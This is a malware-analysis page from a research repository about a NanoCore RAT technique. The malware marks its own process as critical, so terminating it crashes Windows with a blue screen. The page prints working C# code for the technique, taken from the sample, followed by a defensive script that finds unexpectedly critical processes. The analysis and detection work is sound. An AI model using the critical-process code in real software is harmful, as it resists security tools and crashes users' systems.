MalwareAnalysisSeries

This repository contains the analysis reports, technical details and any tools created to help with malware analysis. Additionally, the repo contains extracted TTPs with code, along with detection rules.


Project maintained by shaddy43

NanoCore 1.2.2.0: Set Critical Process

[Image: RAT]

An interesting TTP that I found during the analysis of the NanoCore client binary is that it has an option to make itself a critical process. The reasons for the malware to make itself a critical process could be one of the following:

This TTP obtains a handle to its own process and sets it as CRITICAL, which crashes Windows whenever the process is closed. This is a unique behaviour extracted from the NanoCore client RAT binary; it maps to multiple MITRE ATT&CK techniques such as Native API and Service Stop, but I think the context here is defense evasion: masquerading as a critical system process to avoid detection and to prevent termination by anti-malware systems.

Elevated privileges are required to execute this TTP.

Implementation

Import APIs

NanoCore makes its process critical using the undocumented Windows native API NtSetInformationProcess, exported by ntdll.dll.

// Requires System.Runtime.InteropServices. The call returns an NTSTATUS (0 = success).
[DllImport("ntdll.dll")]
public static extern int NtSetInformationProcess(IntPtr processHandle, int processInformationClass, ref int processInformation, int processInformationLength);

Check Elevation

The prerequisite for achieving this behaviour is to have elevated privileges, so the first step is to validate the privileges.

// Requires System.Security.Principal. Membership of the Administrators role is
// used here as the proxy for "running elevated".
private static bool CheckElevation()
{
    WindowsIdentity identity = WindowsIdentity.GetCurrent();
    WindowsPrincipal principal = new WindowsPrincipal(identity);

    // IsInRole already yields the bool; no if/else needed around it
    return principal.IsInRole(WindowsBuiltInRole.Administrator);
}

Set Critical Process

The following code retrieves the current process handle, enters debug mode, and calls the undocumented NtSetInformationProcess function to change the process's critical status. If successful, it exits debug mode and returns true; otherwise, it logs the error and returns false. The method ensures that the process, once critical, crashes the system if it is terminated, a technique often used by malware for defense evasion, self-preservation or to disrupt the system.

// Configuration flag used by the complete project (true = mark this process critical);
// assumed here and defined so the fragment compiles on its own.
private static bool set_critical_config = true;

static void Main(string[] args)
{
    if (!CheckElevation())
    {
        // exit: the critical flag cannot be set without elevation
        Console.WriteLine("Elevated Privileges Required...!!!");
        Environment.Exit(1);
    }

    if (SetCritical(set_critical_config))
    {
        Console.WriteLine("Process is Set to Critical");
        Console.WriteLine("Do not close the process with Process Name: " + Process.GetCurrentProcess().ProcessName + " and Process ID: " + Process.GetCurrentProcess().Id);
        Console.WriteLine("OR SYSTEM WILL CRASH");
    }
    else
    {
        Console.WriteLine("Failed");
    }

    // Wait for user input here to examine the process (e.g. in a process viewer)
    Console.ReadLine();
}

private static bool SetCritical(bool critical)
{
    try
    {
        IntPtr currentProcessHandle = Process.GetCurrentProcess().Handle;
        if (currentProcessHandle != IntPtr.Zero)
        {
            // EnterDebugMode enables SeDebugPrivilege on the current token, which
            // NtSetInformationProcess requires for this information class
            Process.EnterDebugMode();
            int num = critical ? 1 : 0;
            // 29 = ProcessBreakOnTermination: a non-zero value marks the process critical,
            // so the kernel bugchecks (BSOD) when it exits. The return value is an NTSTATUS.
            int num2 = NtSetInformationProcess(currentProcessHandle, 29, ref num, 4);
            if (num2 != 0)
            {
                // Original NanoCore logging call, kept for reference:
                //Class8.smethod_86(new Exception(string.Format("Call to NtSetInformationProcess has failed with error code {0:X}", num2)), "UpdateProcessBreakOnTermination");

                Console.WriteLine("Call to NtSetInformationProcess has failed with error code {0:X}", num2);
                Process.LeaveDebugMode();   // drop the privilege on the failure path too
                return false;
            }
            Process.LeaveDebugMode();
            return true;
        }
        else
        {
            Console.WriteLine("Failed to retrieve handle to the current module.");
            return false;
        }
    }
    catch (Exception exception_)
    {
        // Original NanoCore logging call, kept for reference:
        //Class8.smethod_86(exception_, "UpdateProcessBreakOnTermination");
        Console.WriteLine("UpdateProcessBreakOnTermination: " + exception_);
        return false;
    }
}

NOTE: After executing the binary, it waits for user input; if the process is then closed, the system will CRASH with a BSOD. Execute at your own RISK!!!
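For the defender's side of this TTP, the following added example (not from this repository or the NanoCore sample) enumerates running processes and reads the same ProcessBreakOnTermination flag back with NtQueryInformationProcess, reporting any critical process that is not one of the well-known system processes. It assumes information class 29 is ProcessBreakOnTermination, as in the code above, that PROCESS_QUERY_INFORMATION (0x0400) is enough access for the query, and that the expected-critical name list is a constructed heuristic; run it elevated so more processes can be opened.

```csharp
// Added example, not from the page or the NanoCore sample: list processes whose
// ProcessBreakOnTermination flag (class 29, the one the malware sets) is on, i.e.
// processes that will BSOD the machine if terminated. Assumes PROCESS_QUERY_INFORMATION
// (0x0400) suffices for the query; run elevated so more processes can be opened.
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
static class CriticalProcessAudit
{
    const int ProcessBreakOnTermination = 29;
    const uint PROCESS_QUERY_INFORMATION = 0x0400;

    [DllImport("ntdll.dll")]
    static extern int NtQueryInformationProcess(IntPtr hProcess, int infoClass,
        ref int info, int infoLength, ref int returnLength);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint desiredAccess, bool inheritHandle, int pid);
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr handle);

    // true/false when the flag could be read; null when the process could not be queried
    public static bool? IsCritical(int pid)
    {
        IntPtr h = OpenProcess(PROCESS_QUERY_INFORMATION, false, pid);
        if (h == IntPtr.Zero) return null;
        try
        {
            int flag = 0, returned = 0;
            int status = NtQueryInformationProcess(h, ProcessBreakOnTermination, ref flag, sizeof(int), ref returned);
            return status == 0 ? flag != 0 : (bool?)null;   // non-zero NTSTATUS = query failed
        }
        finally { CloseHandle(h); }
    }

    // Constructed heuristic: processes Windows marks critical by design; anything else is worth a look.
    static readonly HashSet<string> ExpectedCritical = new HashSet<string>(StringComparer.OrdinalIgnoreCase)
        { "System", "smss", "csrss", "wininit", "winlogon", "services", "lsass", "svchost" };

    static void Main()
    {
        foreach (Process p in Process.GetProcesses())
        {
            if (IsCritical(p.Id) != true) continue;
            string tag = ExpectedCritical.Contains(p.ProcessName) ? "expected" : "SUSPICIOUS";
            Console.WriteLine($"{tag,-10} PID {p.Id,6}  {p.ProcessName}");
        }
    }
}
```

A SUSPICIOUS line for a binary running from a user-writable directory is exactly the artifact this TTP leaves behind; terminate such a process only from a clean boot or a snapshot, since killing it live triggers the BSOD described above.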

Find the complete code here: Shaddy43/MalwareAnalysisSeries

Disclaimer

The artifacts and code in this repository are intended for educational purposes only!!!